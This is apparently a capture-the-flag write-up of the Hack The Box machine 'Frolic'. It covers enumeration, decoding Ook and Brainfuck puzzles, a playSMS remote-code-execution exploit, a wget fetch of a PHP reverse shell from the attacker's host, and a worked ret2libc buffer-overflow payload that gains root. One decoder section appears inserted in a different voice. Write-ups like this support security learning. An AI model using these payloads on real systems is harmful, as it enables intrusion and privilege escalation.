---
title: Frolic
tags: Linux, Encoding
---
# Recon
Getting a bit wiser about how this works, so I visit the web interface while
I start the basic Nmap scan. Interestingly, though, it doesn't appear to have an
HTTP interface, so I have to hang about waiting on the scan.
## NMAP
~~~ term
dang@dang-laptop ~/Documents/HTB$ nmap -sV 10.10.10.111
Starting Nmap 7.70 ( https://nmap.org ) at 2019-02-28 22:30 GMT
Nmap scan report for 10.10.10.111
Host is up (0.17s latency).
Not shown: 996 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.4 (Ubuntu Linux; protocol 2.0)
139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
9999/tcp open http nginx 1.10.3 (Ubuntu)
Service Info: Host: FROLIC; OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 26.96 seconds
~~~
We can visit port 9999 and discover that we have an nginx server, so it does have a web interface after all.
~~~ term
dang@dang-laptop ~$ nmap -A 10.10.10.111
Starting Nmap 7.70 ( https://nmap.org ) at 2019-03-04 21:01 GMT
Nmap scan report for 10.10.10.111
Host is up (0.051s latency).
Not shown: 996 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.4 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 87:7b:91:2a:0f:11:b6:57:1e:cb:9f:77:cf:35:e2:21 (RSA)
| 256 b7:9b:06:dd:c2:5e:28:44:78:41:1e:67:7d:1e:b7:62 (ECDSA)
|_ 256 21:cf:16:6d:82:a4:30:c3:c6:9c:d7:38:ba:b5:02:b0 (ED25519)
139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp open netbios-ssn Samba smbd 4.3.11-Ubuntu (workgroup: WORKGROUP)
9999/tcp open http nginx 1.10.3 (Ubuntu)
|_http-server-header: nginx/1.10.3 (Ubuntu)
|_http-title: Welcome to nginx!
Service Info: Host: FROLIC; OS: Linux; CPE: cpe:/o:linux:linux_kernel
Host script results:
|_clock-skew: mean: -1h48m40s, deviation: 3h10m30s, median: 1m18s
|_nbstat: NetBIOS name: FROLIC, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)
| smb-os-discovery:
| OS: Windows 6.1 (Samba 4.3.11-Ubuntu)
| Computer name: frolic
| NetBIOS computer name: FROLIC\x00
| Domain name: \x00
| FQDN: frolic
|_ System time: 2019-03-05T02:32:43+05:30
| smb-security-mode:
| account_used: guest
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
| smb2-security-mode:
| 2.02:
|_ Message signing enabled but not required
| smb2-time:
| date: 2019-03-04 21:02:42
|_ start_date: N/A
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 16.81 seconds
dang@dang-laptop ~$
~~~
## HTTP Enumeration
Port 9999 serves the standard nginx welcome page.
### Nikto
~~~
root@kali:~# nikto -host 10.10.10.111 -port 9999
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP: 10.10.10.111
+ Target Hostname: 10.10.10.111
+ Target Port: 9999
+ Start Time: 2019-03-05 15:24:48 (GMT0)
---------------------------------------------------------------------------
+ Server: nginx/1.10.3 (Ubuntu)
+ Server leaks inodes via ETags, header found with file /, fields: 0x5ba78110 0x27d
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ OSVDB-3092: /admin/: This might be interesting...
+ OSVDB-3092: /backup/: This might be interesting...
+ /test/: Output from the phpinfo() function was found.
+ OSVDB-3092: /test/: This might be interesting...
+ /test/index.php: Output from the phpinfo() function was found.
+ OSVDB-3233: /test/index.php: PHP is installed, and a test script which runs phpinfo() was found. This gives a lot of system information.
+ /admin/index.html: Admin login page/section found.
+ 7501 requests: 0 error(s) and 11 item(s) reported on remote host
+ End Time: 2019-03-05 15:28:50 (GMT0) (242 seconds)
---------------------------------------------------------------------
~~~
### Dirbuster
Dirbuster found, among others:
- test/
- backup/
~~~
Dir found: /test/ - 200
File found: /test/index.php - 200
Dir found: /admin/css/ - 403
Dir found: /dev/ - 403
Dir found: /admin/js/ - 403
Dir found: /backup/ - 200
File found: /backup/index.php - 200
Dir found: /dev/backup/ - 200
File found: /dev/backup/index.php - 200
Dir found: /loop/ - 403
Dir found: /backup/loop/ - 403
Dir found: /loop/loop/ - 403
Dir found: /backup/loop/loop/ - 403
Dir found: /loop/loop/loop/ - 403
Dir found: /backup/loop/loop/loop/ - 403
Dir found: /loop/loop/loop/loop/ - 403
Dir found: /backup/loop/loop/loop/loop/ - 403
~~~
Inside /dev/backup we find a reference to /playsms.
Inside /backup we get a username and password:
- admin:imnothuman
Which turn out to be SMB creds!! However, that led me on a "merry chase"
down the SMB rabbit hole.
### Continuing the HTTP Enum
The /admin directory gives us a login page.
- The page source shows the credentials admin and superduperlooperpassword_lol
Logging in presents http://10.10.10.111:9999/admin/success.html
Which contains:
~~~ term
..... ..... ..... .!?!! .?... ..... ..... ...?. ?!.?. ..... ..... ..... ..... ..... ..!.? ..... ..... .!?!! .?... ..... ..?.? !.?.. ..... ..... ....! ..... ..... .!.?. ..... .!?!! .?!!! !!!?. ?!.?! !!!!! !...! ..... ..... .!.!! !!!!! !!!!! !!!.? ..... ..... ..... ..!?! !.?!! !!!!! !!!!! !!!!? .?!.? !!!!! !!!!! !!!!! .?... ..... ..... ....! ?!!.? ..... ..... ..... .?.?! .?... ..... ..... ...!. !!!!! !!.?. ..... .!?!! .?... ...?. ?!.?. ..... ..!.? ..... ..!?! !.?!! !!!!? .?!.? !!!!! !!!!. ?.... ..... ..... ...!? !!.?! !!!!! !!!!! !!!!! ?.?!. ?!!!! !!!!! !!.?. ..... ..... ..... .!?!! .?... ..... ..... ...?. ?!.?. ..... !.... ..... ..!.! !!!!! !.!!! !!... ..... ..... ....! .?... ..... ..... ....! ?!!.? !!!!! !!!!! !!!!! !?.?! .?!!! !!!!! !!!!! !!!!! !!!!! .?... ....! ?!!.? ..... .?.?! .?... ..... ....! .?... ..... ..... ..!?! !.?.. ..... ..... ..?.? !.?.. !.?.. ..... ..!?! !.?.. ..... .?.?! .?... .!.?. ..... .!?!! .?!!! !!!?. ?!.?! !!!!! !!!!! !!... ..... ...!. ?.... ..... !?!!. ?!!!! !!!!? .?!.? !!!!! !!!!! !!!.? ..... ..!?! !.?!! !!!!? .?!.? !!!.! !!!!! !!!!! !!!!! !.... ..... ..... ..... !.!.? ..... ..... .!?!! .?!!! !!!!! !!?.? !.?!! !.?.. ..... ....! ?!!.? ..... ..... ?.?!. ?.... ..... ..... ..!.. ..... ..... .!.?. ..... ...!? !!.?! !!!!! !!?.? !.?!! !!!.? ..... ..!?! !.?!! !!!!? .?!.? !!!!! !!.?. ..... ...!? !!.?. ..... ..?.? !.?.. !.!!! !!!!! !!!!! !!!!! !.?.. ..... ..!?! !.?.. ..... .?.?! .?... .!.?. ..... ..... ..... .!?!! .?!!! !!!!! !!!!! !!!?. ?!.?! !!!!! !!!!! !!.!! !!!!! ..... ..!.! !!!!! !.?.
~~~
> NOTE: Got a bit stuck here. Looking on the forums, this looks like
> it could be Blub or Ook (a Brainfuck derivative, and there is a
> clue about fish).
Converting the code (a small Python script prepends "Ook" to each symbol,
then the result is run through an online Ook parser) we end up with:
~~~
Nothing here check /asdiSIAJJ0QWE9JAS
~~~
> NOTE: This is where I discovered CyberChef. Bloody godsend given
> that the next bit is all about decoding a silly number of times.
Navigating there gives us a second message.
~~~
UEsDBBQACQAIAMOJN00j/lsUsAAAAGkCAAAJABwAaW5kZXgucGhwVVQJAAOFfKdbhXynW3V4CwAB BAAAAAAEAAAAAF5E5hBKn3OyaIopmhuVUPBuC6m/U3PkAkp3GhHcjuWgNOL22Y9r7nrQEopVyJbs K1i6f+BQyOES4baHpOrQu+J4XxPATolb/Y2EU6rqOPKD8uIPkUoyU8cqgwNE0I19kzhkVA5RAmve EMrX4+T7al+fi/kY6ZTAJ3h/Y5DCFt2PdL6yNzVRrAuaigMOlRBrAyw0tdliKb40RrXpBgn/uoTj lurp78cmcTJviFfUnOM5UEsHCCP+WxSwAAAAaQIAAFBLAQIeAxQACQAIAMOJN00j/lsUsAAAAGkC AAAJABgAAAAAAAEAAACkgQAAAABpbmRleC5waHBVVAUAA4V8p1t1eAsAAQQAAAAABAAAAABQSwUG AAAAAAEAAQBPAAAAAwEAAAAA
~~~
Which, with a bit of faffing, turns out to be a base64-encoded zip file.
- Which is password protected.
We make use of fcrackzip:
~~~
user@kali:~$ fcrackzip -u -D -p /usr/share/wordlists/rockyou.txt data.zip
PASSWORD FOUND!!!!: pw == password
user@kali:~$
~~~
Unzipping gives us an index.php file.
Which, if we convert it to ASCII and then decode from Base64, leaves us with Brainfuck,
which in turn translates to:
~~~
idkwhatispass
~~~
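The Short Ook blob on success.html is just Brainfuck with each instruction written as a pair of `.`, `!` and `?` symbols, so it can be decoded offline rather than by prepending `Ook` and pasting it into a web parser; the same interpreter then runs the Brainfuck recovered from index.php. This is an added example, not the author's script, and the sample program it decodes is constructed here (it prints "Hi").

```python
# Short Ook (and full "Ook. Ook?") decoder plus a small Brainfuck interpreter.
# Only the punctuation of each Ook token matters, so "Ook. Ook?" and ".?" are
# the same instruction; one pair of symbols is one Brainfuck instruction.
OOK_TO_BF = {
    ".?": ">", "?.": "<", "..": "+", "!!": "-",
    "!.": ".", ".!": ",", "!?": "[", "?!": "]",
}

def ook_to_brainfuck(src):
    """Translate Ook!/Short Ook source to Brainfuck, ignoring 'Ook' and whitespace."""
    symbols = [c for c in src if c in ".!?"]
    if len(symbols) % 2:
        raise ValueError("odd number of Ook symbols: truncated or not Ook")
    return "".join(OOK_TO_BF[a + b] for a, b in zip(symbols[::2], symbols[1::2]))

def run_brainfuck(code, max_steps=1000000):
    """Interpret Brainfuck with 8-bit wrapping cells and a step cap, so a
    malformed or hostile program cannot spin the decoder forever."""
    jumps, stack = {}, []  # matching bracket positions, found up front
    for i, c in enumerate(code):
        if c == "[":
            stack.append(i)
        elif c == "]":
            if not stack:
                raise ValueError("unmatched ']' at offset %d" % i)
            j = stack.pop()
            jumps[i], jumps[j] = j, i
    if stack:
        raise ValueError("unmatched '[' at offset %d" % stack[-1])
    tape, ptr, pc, steps, out = [0] * 30000, 0, 0, 0, []
    while pc < len(code):
        steps += 1
        if steps > max_steps:
            raise RuntimeError("step limit exceeded")
        c = code[pc]
        if c == ">":
            ptr += 1
        elif c == "<":
            ptr -= 1
        elif c == "+":
            tape[ptr] = (tape[ptr] + 1) & 0xFF
        elif c == "-":
            tape[ptr] = (tape[ptr] - 1) & 0xFF
        elif c == ".":
            out.append(chr(tape[ptr]))
        elif c == "[" and tape[ptr] == 0:
            pc = jumps[pc]  # skip the loop body
        elif c == "]" and tape[ptr] != 0:
            pc = jumps[pc]  # jump back to the matching '['
        pc += 1  # ',' (input) is never used by these blobs, so it is ignored
    return "".join(out)

def decode_ook(src):
    """Ook/Short Ook source -> program output."""
    return run_brainfuck(ook_to_brainfuck(src))

# Constructed sample (not the challenge blob): the Brainfuck program
# ++++++++[>+++++++++<-]>. followed by 33 '+' and '.', which prints "Hi".
SAMPLE = ("." * 16 + "!?" + ".?" + "." * 18 + "?." + "!!" + "?!"
          + ".?" + "!." + "." * 66 + "!.")

if __name__ == "__main__":
    print(ook_to_brainfuck(SAMPLE))
    print(decode_ook(SAMPLE))  # prints "Hi"
```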
This works as the password (with username admin) on
http://10.10.10.111:9999/playsms/index.php?app=main&inc=core_welcome
# Play SMS Exploit
https://amonsec.net/ctf/dina-ctf-walkthrough
https://www.exploit-db.com/exploits/42003/
## Getting User
Grab a script from https://github.com/jasperla/CVE-2017-9101
~~~ term
$ python playsms.py --url http://10.10.10.111:9999/playsms -i
~~~
And I get user:
~~~ term
> cat /home/ayush/user.txt
<Response [200]>
2ab95909cf509f85a6f476b59a0c2fe0
~~~
# Getting Root.
Standard enumeration: look for SUID files. This time we find
~~~ term
-rwsr-xr-x 1 root root 7480 Sep 25 00:59 /home/ayush/.binary/rop
~~~
ROP, sounds like a clue.
## Trying the exploit on my machine
We can copy that across by copying it to the www directory, then downloading it.
Seems like we have an overflow with some ROP-based programming, so I can follow along with this:
https://resources.infosecinstitute.com/hack-the-box-htb-machines-walkthrough-series-october/
First step: determine the buffer overflow
~~~ term
(env) dang@dang-laptop ~/Documents/HTB/Frolic$ ./rop `python2 -c "print 'A' * 1000"`
~~~
Or in GDB
~~~ term
Starting program: /home/dang/Documents/HTB/Frolic/rop `python2 -c "print 'A' * 56"`
Program received signal SIGSEGV, Segmentation fault.
0x41414141 in ?? ()
(gdb)
~~~
Looks like we grab EIP at 52 bytes
~~~ term
Starting program: /home/dang/Documents/HTB/Frolic/rop `python2 -c "print 'A' * 52 + 'BBBB'"`
Program received signal SIGSEGV, Segmentation fault.
0x42424242 in ?? ()
(gdb)
~~~
We want to follow the basic ROP technique of `<system><exit><"/bin/sh">`.
These will live in libc, so we need to find them.
We also know that they are offsets from the libc base address...
~~~ term
(env) dang@dang-laptop ~/Documents/HTB/Frolic$ ldd ./rop | grep libc
libc.so.6 => /usr/lib32/libc.so.6 (0xf7dad000)
(env) dang@dang-laptop ~/Documents/HTB/Frolic$ ldd ./rop | grep libc
libc.so.6 => /usr/lib32/libc.so.6 (0xf7d15000)
(env) dang@dang-laptop ~/Documents/HTB/Frolic$ ldd ./rop | grep libc
libc.so.6 => /usr/lib32/libc.so.6 (0xf7d14000)
(env) dang@dang-laptop ~/Docume
~~~
This is moving around, so let's
(Note: to start off with I want to make my life easy, so let's disable ASLR)
~~~ term
(env) dang@dang-laptop ~/Documents/HTB/Frolic$ cat /proc/sys/kernel/randomize_va_space
2
(env) dang@dang-laptop ~/Documents/HTB/Frolic$ sudo sysctl kernel.randomize_va_space=0
~~~
Which means libc is now fixed at 0xf7dc4000
~~~ term
(env) dang@dang-laptop ~/Documents/HTB/Frolic$ ldd ./rop | grep libc 1 ↵
libc.so.6 => /usr/lib32/libc.so.6 (0xf7dc4000)
~~~
Let's grab system from libc (NOTE: don't be a dick, check the address of libc)
~~~ term
(env) dang@dang-laptop ~/Documents/HTB/Frolic$ readelf -s /usr/lib32/libc.so.6| grep system
257: 0012adb0 102 FUNC GLOBAL DEFAULT 13 svcerr_systemerr@GLIBC_2.0
657: 0003e8f0 55 FUNC GLOBAL DEFAULT 13 __libc_system@@GLIBC_PRIVATE
1524: 0003e8f0 55 FUNC WEAK DEFAULT 13 system@@GLIBC_2.0
569: 00000000 0 FILE LOCAL DEFAULT ABS system.c
570: 0003e3f0 1071 FUNC LOCAL DEFAULT 13 do_system
5335: 0012adb0 102 FUNC LOCAL DEFAULT 13 __GI_svcerr_systemerr
6792: 0012adb0 102 FUNC LOCAL DEFAULT 13 __EI_svcerr_systemerr
7434: 0003e8f0 55 FUNC WEAK DEFAULT 13 system
7486: 0012adb0 102 FUNC GLOBAL DEFAULT 13 svcerr_systemerr@GLIBC_2.
8144: 0003e8f0 55 FUNC GLOBAL DEFAULT 13 __libc_system
(env) dang@dang-laptop ~/Documents/HTB/Frolic$
~~~
So system is `1524: 0003e8f0 55 FUNC WEAK DEFAULT 13 system@@GLIBC_2.0`.
And exit:
~~~ term
(env) dang@dang-laptop ~/Documents/HTB/Frolic$ readelf -s /usr/lib32/libc.so.6| grep exit
121: 00031db0 39 FUNC GLOBAL DEFAULT 13 __cxa_at_quick_exit@@GLIBC_2.10
150: 000318e0 33 FUNC GLOBAL DEFAULT 13 exit@@GLIBC_2.0
~~~
And find the string /bin/sh:
~~~ term
dang@dang-laptop ~/Documents/HTB/Frolic$ strings -a -t x /usr/lib32/libc.so.6 | grep /bin/sh
17faaa /bin/sh
~~~
As these are offsets, we need to calculate the real addresses relative to the libc base address:
- Libc 0xf7dc4000
- System 0x45380
- Exit 0x3a570
- /bin/sh 0x17faaa

| Symbol | Address | Bytes |
|---------|------------|-------------|
| system | 0xf7e028f0 | f7 e0 28 f0 |
| exit | 0xf7df58e0 | f7 df 58 e0 |
| /bin/sh | 0xf7f43aaa | f7 f4 3a aa |

Therefore our overflow becomes `<52 bytes of padding><system><exit><"/bin/sh">`,
or (remember endianness):
~~~ term
python2 -c "print 'A'*52+'\xf0\x28\xe0\xf7\xe0\x58\xdf\xf7\xaa\xba\xfb\xf7'"
~~~
Which gives me an error of `nsorted: command not found`...
~~~ term
(env) dang@dang-laptop ~/Documents/HTB/Frolic$ ./rop `python2 -c "print 'A'*52 + '\xf0\x28\xe0\xf7\xe0\x58\xdf\xf7\x19\x85\xf4\xf7' + 'C'*50"`
sh: nsorted: command not found
[+] Message sent: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA�(��X���CCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCC%
~~~
> NOTE: Ended up doing this again in GDB. Turns out I was calling out
> to the wrong version of glibc. Live and Learn :(
## Trying the ROP chain in GDB
So I can work out what is happening.
Confirm that we control EIP:
~~~ term
(gdb) run `python2 -c "print 'A'*52 + 'BBBB'"
~~~
Find the addresses of system and exit (which match the ones we calculated):
~~~ term
Breakpoint 1 at 0x80484aa
(gdb) run
The program being debugged has been started already.
Start it from the beginning? (y or n) y
Starting program: /home/dang/Documents/HTB/Frolic/rop `python2 -c "print 'A'*52 + 'BBBB'"`
Breakpoint 1, 0x080484aa in main ()
(gdb) p system
$1 = {<text variable, no debug info>} 0xf7e028f0 <system>
(gdb)
(gdb) p exit
$2 = {<text variable, no debug info>} 0xf7df58e0 <exit>
(gdb)
~~~
We could then confirm we hit system (at least)
~~~ term
(gdb) break system
Breakpoint 2 at 0xf7e028f0
~~~
Without the mangled address (plain BBBB):
~~~ term
(gdb) run `python2 -c "print 'A'*52 + 'BBBB'"`
Starting program: /home/dang/Documents/HTB/Frolic/rop `python2 -c "print 'A'*52 + 'BBBB'"`
Breakpoint 1, 0x080484aa in main ()
(gdb) continue
Continuing.
Program received signal SIGSEGV, Segmentation fault.
0x42424242 in ?? ()
(gdb) continue
Continuing.
Program terminated with signal SIGSEGV, Segmentation fault.
The program no longer exists.
(gdb)
~~~
And with it:
~~~ term
(gdb) run `python2 -c "print 'A'*52 + '\xf0\x28\xe0\xf7'"`
Starting program: /home/dang/Documents/HTB/Frolic/rop `python2 -c "print 'A'*52 + '\xf0\x28\xe0\xf7'"`
Breakpoint 1, 0x080484aa in main ()
(gdb) continue
Continuing.
Breakpoint 2, 0xf7e028f0 in system () from /usr/lib32/libc.so.6
(gdb) continue
Continuing.
[Detaching after fork from child process 30400]
sh: $'4\325\377\377X\325\377\377': command not found
Program received signal SIGSEGV, Segmentation fault.
0xffffd500 in ?? ()
(gdb)
~~~
Adding exit:
~~~ term
Starting program: /home/dang/Documents/HTB/Frolic/rop `python2 -c "print 'A'*52 + '\xf0\x28\xe0\xf7\xe0\x58\xdf\xf7'"`
Breakpoint 1, 0x080484aa in main ()
(gdb) continue
Continuing.
Breakpoint 2, 0xf7e028f0 in system () from /usr/lib32/libc.so.6
(gdb) continue
Continuing.
[Detaching after fork from child process 30405]
sh: $'\323\377\377': command not found
[+] Message sent: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA�(��X�[Inferior 1 (process 30403) exited with code 0300]
(gdb)
~~~
And adding /bin/sh from where we calculated it would be (f7 f4 3a aa):
~~~ term
(gdb) run `python2 -c "print 'A'*52 + '\xf0\x28\xe0\xf7\xe0\x58\xdf\xf7\xaa\x3a\xf4\xf7'"`
The program being debugged has been started already.
Start it from the beginning? (y or n) y
Starting program: /home/dang/Documents/HTB/Frolic/rop `python2 -c "print 'A'*52 + '\xf0\x28\xe0\xf7\xe0\x58\xdf\xf7\xaa\x3a\xf4\xf7'"`
Breakpoint 1, 0x080484aa in main ()
(gdb) continue
Continuing.
Breakpoint 2, 0xf7e028f0 in system () from /usr/lib32/libc.so.6
(gdb) continue
Continuing.
[Detaching after fork from child process 30938]
sh-5.0$
~~~
WOOT!!!
## Rooting the Box
Firstly, the shell I have been using is a bit fraught; replace it with
the Pentest Monkey PHP reverse shell to see if that behaves better.
Fire up a Python web server and:
~~~ term
> wget 10.10.14.251:8000/dangPayload.php -O plugin/dangPayload.php
<Response [200]>
~~~
Things behave a bit better.
Nice that ASLR is turned off on the box:
~~~ term
$ cat /proc/sys/kernel/randomize_va_space
0
~~~
Let's also copy a local version across so I can play without screwing
up the main binary.
~~~ term
cp /home/ayush/.binary/rop rop
~~~
Confirm the base address of libc (it is the same for the copy and the original):
~~~ term
$ ldd rop | grep libc
libc.so.6 => /lib/i386-linux-gnu/libc.so.6 (0xb7e19000)
$ ldd rop | grep libc
libc.so.6 => /lib/i386-linux-gnu/libc.so.6 (0xb7e19000)
$
$ ldd /home/ayush/.binary/rop | grep libc
libc.so.6 => /lib/i386-linux-gnu/libc.so.6 (0xb7e19000)
$
~~~
And system:
~~~ term
$ readelf -s /lib/i386-linux-gnu/libc.so.6 | grep system
245: 00112f20 68 FUNC GLOBAL DEFAULT 13 svcerr_systemerr@@GLIBC_2.0
627: 0003ada0 55 FUNC GLOBAL DEFAULT 13 __libc_system@@GLIBC_PRIVATE
1457: 0003ada0 55 FUNC WEAK DEFAULT 13 system@@GLIBC_2.0
$
~~~
And exit:
~~~ term
$ readelf -s /lib/i386-linux-gnu/libc.so.6 | grep exit
112: 0002edc0 39 FUNC GLOBAL DEFAULT 13 __cxa_at_quick_exit@@GLIBC_2.10
141: 0002e9d0 31 FUNC GLOBAL DEFAULT 13 exit@@GLIBC_2.0
~~~
And /bin/sh:
~~~ term
$ strings -a -t x /lib/i386-linux-gnu/libc.so.6 | grep /bin/sh
15ba0b /bin/sh
$
~~~
## Offset Notes
- Libc /lib/i386-linux-gnu/libc.so.6 0xb7e19000
- System: 0x0003ada0
- Exit: 0x0002e9d0
- Bin Sh: 0x15ba0b
From the offset calc script:

| Symbol | Address | Bytes |
|---------|------------|-------------|
| system | 0xb7e53da0 | b7 e5 3d a0 |
| exit | 0xb7e479d0 | b7 e4 79 d0 |
| /bin/sh | 0xb7f74a0b | b7 f7 4a 0b |

So the payload is:
~~~ term
python2 -c "print 'A'*52+'\x0a\x3d\xe5\xb7'+'\xd0\x79\xe4\xb7'+'\x0b\x4a\xf7\xb7'"
~~~
We can try this, though it doesn't help:
~~~ term
$ ltrace ./dangrop `python2 -c "print 'A'*52+'\x0a\x3d\xe5\xb7\xd0\x79\xe4\xb7\x0b\x4a\xf7\xb7'"`
Segmentation fault (core dumped)
$
~~~
~~~ term
strace ./dangrop `python2 -c "print 'A'*52+'B'"`
~~~
Which I think gives me what I need, as I can confirm control of EIP.
~~~ term
--- SIGSEGV {si_signo=SIGSEGV, si_code=SEGV_MAPERR, si_addr=0x42424242} ---
+++ killed by SIGSEGV (core dumped) +++
Segmentation fault (core dumped)
www-data@frolic:/tmp/dg$
~~~
## Yet more Faffing for Root!!!
Had to write a script to do the calcs as I was evidently screwing something up:
~~~ python
# Python 2 script (run as `python2 calcoffsets.py`); it prints raw bytes.
# Set of library offsets, taken from the readelf / strings output above:
"""
- System: 0x0003ada0
- Exit: 0x0002e9d0
- Bin Sh: 0x15ba0b
"""
import struct

LIBC = 0xb7e19000   # libc base address from ldd (ASLR is off on the box)
SYSTEM = 0x3ada0
EXIT = 0x2e9d0
SH = 0x15ba0b
sysoffset = LIBC + SYSTEM
exitoffset = LIBC + EXIT
shoffset = LIBC + SH
#print (hex(sysoffset))
#print (hex(exitoffset))
#print (hex(shoffset))
# struct.pack("<I") takes care of the little-endian byte order
out = "A"*52                          # padding up to the saved EIP
out += struct.pack("<I", sysoffset)   # overwritten EIP -> system()
out += struct.pack("<I", exitoffset)  # return address for system() -> exit()
out += struct.pack("<I", shoffset)    # argument for system() -> "/bin/sh"
print out
~~~
~~~ term
$ /home/ayush/.binary/rop `python2 calcoffsets.py`
/home/ayush/.binary/rop `python2 calcoffsets.py`
# whoami
###whoami
###root
# cd /root
# cat root.txt
####cat root.txt
####85d3fdf03f969892538ba9a731826222
~~~
# The Rabbit Hole of SMB Enumeration (RABBIT)
- Enumerating users comes back empty:
~~~
user@MarbleArch ~ % smbmap -H 10.10.10.111
[+] Finding open SMB ports....
[+] Guest SMB session established on 10.10.10.111...
[+] IP: 10.10.10.111:445 Name: 10.10.10.111
Disk Permissions
---- -----------
print$ NO ACCESS
IPC$ NO ACCESS
user@MarbleArch ~ %
~~~
~~~
127 user@MarbleArch ~ % nmap --script smb-enum-shares -p 139,445 10.10.10.111 :(
Starting Nmap 7.70 ( https://nmap.org ) at 2019-03-01 08:51 GMT
Nmap scan report for 10.10.10.111
Host is up (0.025s latency).
PORT STATE SERVICE
139/tcp open netbios-ssn
445/tcp open microsoft-ds
Host script results:
| smb-enum-shares:
| account_used: guest
| \\10.10.10.111\IPC$:
| Type: STYPE_IPC_HIDDEN
| Comment: IPC Service (frolic server (Samba, Ubuntu))
| Users: 1
| Max Users: <unlimited>
| Path: C:\tmp
| Anonymous access: READ/WRITE
| Current user access: READ/WRITE
| \\10.10.10.111\print$:
| Type: STYPE_DISKTREE
| Comment: Printer Drivers
| Users: 0
| Max Users: <unlimited>
| Path: C:\var\lib\samba\printers
| Anonymous access: <none>
|_ Current user access: <none>
Nmap done: 1 IP address (1 host up) scanned in 3.41 seconds
user@MarbleArch ~ %
~~~
### Manually checking
First let's enumerate the shares...
~~~
user@kali:~$ smbclient -L 10.10.10.111 -n
WARNING: The "syslog" option is deprecated
Enter WORKGROUP\user's password:
OS=[Windows 6.1] Server=[Samba 4.3.11-Ubuntu]
Sharename Type Comment
--------- ---- -------
print$ Disk Printer Drivers
IPC$ IPC IPC Service (frolic server (Samba, Ubuntu))
OS=[Windows 6.1] Server=[Samba 4.3.11-Ubuntu]
Server Comment
--------- -------
Workgroup Master
--------- -------
WORKGROUP
user@kali:~$
~~~
So the shares need permissions.
We can check with the following (print$ is locked down):
~~~
user@kali:~$ smbclient //10.10.10.111/IPC$ -N
WARNING: The "syslog" option is deprecated
OS=[Windows 6.1] Server=[Samba 4.3.11-Ubuntu]
smb: \>
~~~